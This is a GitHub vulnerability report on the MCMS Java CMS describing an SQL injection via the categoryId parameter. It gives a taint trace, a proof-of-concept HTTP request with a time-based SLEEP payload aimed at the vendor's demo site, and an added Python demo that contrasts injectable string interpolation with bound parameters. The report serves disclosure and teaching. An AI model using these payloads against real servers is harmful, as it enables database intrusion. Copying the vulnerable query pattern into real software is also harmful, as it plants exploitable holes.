ming-soft / MCMS

Fully open source! A Java rapid-development platform built on Spring, Spring MVC and MyBatis. MStore provides more useful plugins and templates (articles, shop, WeChat, forum, members, comments, payment, points, workflow, task scheduling, etc.) together with hundreds of free templates to choose from. Value comes from sharing! MingSoft is not just a simple, easy-to-use open-source system but a complete ecosystem of high-quality open-source content. MingSoft's mission is to lower development cost and raise development efficiency by providing a full enterprise-grade development solution, with a new version released on the 28th of every month.
http://www.mingsoft.net
MIT License
1.49k stars, 662 forks

MCMS V5.1 /src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java has a SQL Injection Vulnerability #58

Closed chauncyman closed 2 years ago

chauncyman commented 2 years ago

Vulnerability file:

/src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java

Vulnerability tracking path:

1. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/CategoryBizImpl.java line 72 -- The return value of the call queryChildren() is tainted
2. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/CategoryBizImpl.java line 72 -- Tainted value is returned
3. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java line 168 -- The return value of the call queryChildren() is tainted
4. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java line 168 -- Tainted value is assigned to variable columns
5. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java line 175 -- Tainted value enters call iterator() from the this argument, then taints the return value
6. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java line 175 -- Tainted value is assigned to variable column~iterator
7. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java line 175 -- Tainted value enters call next() from the this argument, then taints the return value
8. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java line 175 -- Tainted value is assigned to variable column
9. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java line 181 -- Tainted value enters call getId() from the this argument, then taints the return value
10. MCMS-master/src/main/java/net/mingsoft/cms/entity/CategoryEntity.java line 52 -- Tainted variable this.id is returned
11. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java line 181 -- Tainted value enters call setCategoryId() from the 1st argument, then taints the this argument
12. MCMS-master/src/main/java/net/mingsoft/cms/entity/ContentEntity.java line 148 -- Tainted value is assigned to variable this.categoryId
13. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java line 183 -- Tainted value enters call queryIdsByCategoryIdForParser() from the 1st argument
14. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java line 77 -- Tainted value enters call queryIdsByCategoryIdForParser() from the 1st argument
15. MCMS-master/src/main/java/net/mingsoft/cms/dao/IContentDao.xml line 253 -- categoryId

A risk of the SQLi type is triggered, caused by the input parameter categoryId (value shown in the attached screenshot).

PoC

POST /ms/cms/content/list.do HTTP/1.1
Host: cms.demo.mingsoft.net
Content-Length: 21
Pragma: no-cache
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://cms.demo.mingsoft.net
Referer: http://cms.demo.mingsoft.net/ms/cms/category/form.do?id=158&childId=undefined
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ****
Connection: close

contentCategoryId=158'||(SELECT 0x7155656f WHERE 5755=5755 AND (SELECT 1979 FROM (SELECT(SLEEP(5)))dYQF))||'


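To make the sink concrete, here is an added example that is not part of the report or of the MCMS code base: a Python/sqlite3 model of the two ways a MyBatis mapper can place `categoryId` into SQL. `${categoryId}` substitutes the raw string into the statement text (the pattern that produces this class of bug), while `#{categoryId}` binds it as a parameter. The page does not show line 253 of IContentDao.xml, so which form that line uses is an assumption; the table name `cms_content`, its columns and the sample rows are constructed for the demo. The reported PoC uses MySQL's SLEEP(5) as a timing oracle; SQLite has no SLEEP, so the example uses a true and a false injected condition instead, which is the same blind-injection logic with the response content as the oracle rather than elapsed time.

```python
from __future__ import annotations

import sqlite3
from typing import Callable

# Constructed sample data, not taken from MCMS: a minimal content table in the
# shape the category-id lookup needs. Table and column names are assumptions.
SAMPLE_ROWS = [
    (1, "158", "first article in category 158"),
    (2, "158", "second article in category 158"),
    (3, "159", "article in another category"),
]

# Boolean-based stand-ins for the reported payload. The original relies on
# MySQL's SLEEP(5); SQLite has no SLEEP, so one payload carries a condition
# that is true and one a condition that is false. A vulnerable query answers
# the two differently; a parameterised query answers both the same way.
TRUE_PAYLOAD = "158' AND 5755=5755 AND '1'='1"
FALSE_PAYLOAD = "158' AND 5755=5756 AND '1'='1"
DUMP_PAYLOAD = "' OR '1'='1"


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database loaded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE cms_content (id INTEGER PRIMARY KEY, category_id TEXT, title TEXT)"
    )
    conn.executemany("INSERT INTO cms_content VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def query_ids_interpolated(conn: sqlite3.Connection, category_id: str) -> list[int]:
    """Vulnerable: models a mapper written with ${categoryId}. The caller's string
    is spliced into the SQL text, so a quote closes the literal and the rest of
    the value is parsed as SQL."""
    sql = f"SELECT id FROM cms_content WHERE category_id = '{category_id}' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def query_ids_bound(conn: sqlite3.Connection, category_id: str) -> list[int]:
    """Hardened: models a mapper written with #{categoryId}. The value is sent as
    a bound parameter and is only ever compared as data; quotes and keywords
    inside it have no effect on the statement."""
    sql = "SELECT id FROM cms_content WHERE category_id = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (category_id,))]


def is_injectable(query_fn: Callable[[sqlite3.Connection, str], list[int]]) -> bool:
    """Blind-injection check in the style of the PoC: send a payload whose
    injected condition is true and one whose condition is false. If the two
    responses differ, the input reached the SQL parser. A bound parameter
    returns the same empty result for both, because neither string is a real id."""
    conn = make_db()
    return query_fn(conn, TRUE_PAYLOAD) != query_fn(conn, FALSE_PAYLOAD)


if __name__ == "__main__":
    conn = make_db()
    for name, fn in (("${categoryId}", query_ids_interpolated),
                     ("#{categoryId}", query_ids_bound)):
        print(f"{name}: legit 158 -> {fn(conn, '158')}, "
              f"dump payload -> {fn(conn, DUMP_PAYLOAD)}, "
              f"injectable={is_injectable(fn)}")
```

Both functions return the same two ids for the legitimate value `158`; only the interpolated one lets `' OR '1'='1` pull the row from category 159 and answers the true and false probes differently, which is exactly the signal the reported time-based payload turns into a 5-second delay.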